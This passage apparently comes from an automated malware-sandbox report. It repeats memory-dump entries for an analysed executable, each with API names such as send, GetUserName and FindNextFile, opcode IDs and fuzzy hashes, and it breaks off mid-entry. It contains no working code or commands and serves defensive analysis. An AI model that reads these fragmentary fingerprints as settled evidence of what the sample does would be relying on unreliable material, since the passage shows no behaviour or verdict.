                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: a24f7c79d48368e33d7deb9d4eeecb52ce7ec7a6106812cc151fd4020b53ad0d
                                                                                                    • Instruction ID: 1eecfe2d9cb61a59f595e355a150da287637ca12a9750778f21fd6fb20e540dc
                                                                                                    • Opcode Fuzzy Hash: a24f7c79d48368e33d7deb9d4eeecb52ce7ec7a6106812cc151fd4020b53ad0d
                                                                                                    • Instruction Fuzzy Hash: E131A122E1C60285F7517F65884137CAA90BF88BA1FCA0AB5DA1D077D2CF7CE44287B4
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: c925320f46ae1d35358bbac1222783613e1c83ecb4b33bb2503be9c879a590b0
                                                                                                    • Instruction ID: 0084d57d9d63c807981db86844d0970412f7a051a033d818a42fe3592caf80d1
                                                                                                    • Opcode Fuzzy Hash: c925320f46ae1d35358bbac1222783613e1c83ecb4b33bb2503be9c879a590b0
                                                                                                    • Instruction Fuzzy Hash: 7F310676B05B4982EF099F69D49026C73A6EB88F89B988472CF0D07764DF3CD885C350
                                                                                                    APIs
                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75A6B19D4
                                                                                                      • Part of subcall function 00007FF75A720E88: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF75A72C3D2), ref: 00007FF75A720ED8
                                                                                                      • Part of subcall function 00007FF75A720E88: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF75A72C3D2), ref: 00007FF75A720F19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 38560573-0
                                                                                                    • Opcode ID: d3382c30930b80cccaf9dd4f682f073f92bb0937a51e85b6a7a6223b8303d594
                                                                                                    • Instruction ID: 901a16397d67e3f9b070af95dd514c3632a2c0f3d2afd362eb9fef4409910c9b
                                                                                                    • Opcode Fuzzy Hash: d3382c30930b80cccaf9dd4f682f073f92bb0937a51e85b6a7a6223b8303d594
                                                                                                    • Instruction Fuzzy Hash: BC316F62608BC955FB10FF21E4513ADA791FF48B84F884471DA8C07A4ADF7CD951C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3947729631-0
                                                                                                    • Opcode ID: 9e03c0276b42d0bae273c9ceb8b8abd1e24865752fa8da44abca3c0ffcb1668a
                                                                                                    • Instruction ID: 5acb8280b63007c961ab1b77659c12ae9cf447046416b4741e0912abc9d83e54
                                                                                                    • Opcode Fuzzy Hash: 9e03c0276b42d0bae273c9ceb8b8abd1e24865752fa8da44abca3c0ffcb1668a
                                                                                                    • Instruction Fuzzy Hash: C2215A72A046418AFB24AF64C4442AC77E4EB8871CF980A76E72D47BD5DF78D584CBE0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 4bdd7c7df9abbb715da046ae302baf4d590079e7e30464498c50f0bf6b7ea38d
                                                                                                    • Instruction ID: 352b742c6975735c65c1e83cdbf7c07f22fa48ca29befb3696f88b4ef75c97ad
                                                                                                    • Opcode Fuzzy Hash: 4bdd7c7df9abbb715da046ae302baf4d590079e7e30464498c50f0bf6b7ea38d
                                                                                                    • Instruction Fuzzy Hash: F321D432A08A4287FB61AF18D440379B6A0FF89B94F984674EA6D476D9DF3DD4108B10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 277766cc613ac521deff1262cc5973a4c6dda0ce244441028124d0478fb53980
                                                                                                    • Instruction ID: 80b3ef9c95717c711c33ad962035cd4910c53e67ee477238daa76e21f23f0c03
                                                                                                    • Opcode Fuzzy Hash: 277766cc613ac521deff1262cc5973a4c6dda0ce244441028124d0478fb53980
                                                                                                    • Instruction Fuzzy Hash: 1E116032A1D64181FA60BF11980027EEA60FF8DB80F8C48B1EB8C57696CF7ED5008B20
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 42dcc955d4fd3197300f6b05653cf2d2f457e7ff6d65b15765544b4f1739082b
                                                                                                    • Instruction ID: a0d79dc285e0dec55ca55c5d259e29e01cb6a78405d00e9f801aa973ad50f41b
                                                                                                    • Opcode Fuzzy Hash: 42dcc955d4fd3197300f6b05653cf2d2f457e7ff6d65b15765544b4f1739082b
                                                                                                    • Instruction Fuzzy Hash: 0311193291964286F218AF14A840169F2A6FF48754F990CB5EA5D47696DF3CE8508B60
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: ff0cc494d353a1ec7d43363e0801fd2479bc586109dcc0f93f3d887f5ea7b07c
                                                                                                    • Instruction ID: ca550b3dedd7967b17456ea09e3101cf50287338863edfa510a60b3ca6d088a7
                                                                                                    • Opcode Fuzzy Hash: ff0cc494d353a1ec7d43363e0801fd2479bc586109dcc0f93f3d887f5ea7b07c
                                                                                                    • Instruction Fuzzy Hash: 87F0C2A2A05A8645FF08AB24E00437CA396EF44F88F9804B1CA9C0A696DF7DC4C5C390
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: send
                                                                                                    • String ID:
                                                                                                    • API String ID: 2809346765-0
                                                                                                    • Opcode ID: 10723b900c3d3fb221c2729e0f2ab508e71a113b43aaaf7fd55bda6ca2804ccb
                                                                                                    • Instruction ID: 7e3eba17bcc5a5de2d5a409aca0943b582ed16a74e78e6962626dd4f52e9de4d
                                                                                                    • Opcode Fuzzy Hash: 10723b900c3d3fb221c2729e0f2ab508e71a113b43aaaf7fd55bda6ca2804ccb
                                                                                                    • Instruction Fuzzy Hash: 5D01AD26B18A8585EB509F1AB940529A7A1FB8CFD4F8C5270EE5D43B5CEF28D8828700
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2645101109-0
                                                                                                    • Opcode ID: 543acbdf146a9e7b635a600a3cba3d05f3b2ef6cd278b1f660c9ea2185c3ff0f
                                                                                                    • Instruction ID: 8536c0701c8b9a2a3bb54622c1793095e4efddb20c43da1cb1c5a57b9a1e5c6a
                                                                                                    • Opcode Fuzzy Hash: 543acbdf146a9e7b635a600a3cba3d05f3b2ef6cd278b1f660c9ea2185c3ff0f
                                                                                                    • Instruction Fuzzy Hash: 4F01653291878182E720DF25E8403AAF3A1FF9C788F940135E68D42659DFBCD195CB40
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2029273394-0
                                                                                                    • Opcode ID: 752fe5805e453647425062ce64daa4e53c54a82ad0d646f83825288564bb7983
                                                                                                    • Instruction ID: 192288e8a1f8c8fa1fe5c029aa586c7f35718d23531dd730c9761c4d2643e9fa
                                                                                                    • Opcode Fuzzy Hash: 752fe5805e453647425062ce64daa4e53c54a82ad0d646f83825288564bb7983
                                                                                                    • Instruction Fuzzy Hash: 8A014F2660CA8190EA70DF12F4842AAA360FB88B94F840472DE8D43B58DE3CD886CB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 68ea0e6e30933e9dd76abf56f21314c638998a57c534cc3687c594a1fb5b02e7
                                                                                                    • Instruction ID: cca137af824bacccfcbd482a76c153f83d3b2a47e9af4d2f3b09c87c8cc0a8d0
                                                                                                    • Opcode Fuzzy Hash: 68ea0e6e30933e9dd76abf56f21314c638998a57c534cc3687c594a1fb5b02e7
                                                                                                    • Instruction Fuzzy Hash: 5EE09231A19A8285FB647FA9994517CF1547F5C7F0FD84BB1EB3C022C6DE3C94504A24
                                                                                                    APIs
                                                                                                    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF75A71E9E4
                                                                                                      • Part of subcall function 00007FF75A720E6C: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF75A720E74
                                                                                                      • Part of subcall function 00007FF75A720E6C: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF75A720E79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                    • String ID:
                                                                                                    • API String ID: 1208906642-0
                                                                                                    • Opcode ID: 552cadb944fbfa7d273d14e6333c601f02b0659bfbb50ac822d976667c4bc77c
                                                                                                    • Instruction ID: 727613f5213feead9b61667ae50dd9647231c50301c50816018821fc0b456d9c
                                                                                                    • Opcode Fuzzy Hash: 552cadb944fbfa7d273d14e6333c601f02b0659bfbb50ac822d976667c4bc77c
                                                                                                    • Instruction Fuzzy Hash: C4E0EC60D0D28350FEA83E3511462BAD6C46F2D309FDC0CF9E85E021C3AE0E788711B2
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2029273394-0
                                                                                                    • Opcode ID: 4104833be8186ecfced91f05a1dc286f8d4e1ac7fad94ea37a2bf5d234dce428
                                                                                                    • Instruction ID: 2d5b0aab63713f9532694a1f12812a117a8a35d3fcf1c0d503492d7280a31ce5
                                                                                                    • Opcode Fuzzy Hash: 4104833be8186ecfced91f05a1dc286f8d4e1ac7fad94ea37a2bf5d234dce428
                                                                                                    • Instruction Fuzzy Hash: 20C04815F1E943D2F6983F625C8216292E0AF9CB11FDC09B0C50A80250DEACA9E68B21
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoNativeSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1721193555-0
                                                                                                    • Opcode ID: ebb3c2d15c06801dfe805b6087078b0f501a5fe9f8c446694f4975735c5f9cad
                                                                                                    • Instruction ID: 5be734fa6e78ff5e58e9ee821c5f993dcf7891c9de94692e68149ee490161d47
                                                                                                    • Opcode Fuzzy Hash: ebb3c2d15c06801dfe805b6087078b0f501a5fe9f8c446694f4975735c5f9cad
                                                                                                    • Instruction Fuzzy Hash: 6DB09236E188C0C3D611FF08E842029B331FB98B0AFD00460E28E42624CE2CDA2A8E00
                                                                                                    APIs
                                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF75A70A0C6,?,?,-2723E8D8DEBC5093,00007FF75A704E71,?,?,?,?,00007FF75A70D3FC), ref: 00007FF75A70DA85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 4292702814-0
                                                                                                    • Opcode ID: 9ae9f8af891c0b94514e7ea55ed6623f4eb6cc8682cd7ae55c8d48968416ecb5
                                                                                                    • Instruction ID: 29af56a4cc002c55af8e6adeb889ff15e16baac4fb6e23db444df99bf44febcc
                                                                                                    • Opcode Fuzzy Hash: 9ae9f8af891c0b94514e7ea55ed6623f4eb6cc8682cd7ae55c8d48968416ecb5
                                                                                                    • Instruction Fuzzy Hash: 95F0E789B0D707A5FE547EA15C513B6D2856F8CB80FCC5CB0C90E86292EE2CAA818634
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 4292702814-0
                                                                                                    • Opcode ID: eba47d0c810211a009f984e3ce810decee2d7cb9fb39a7e87e15bbee8ef19542
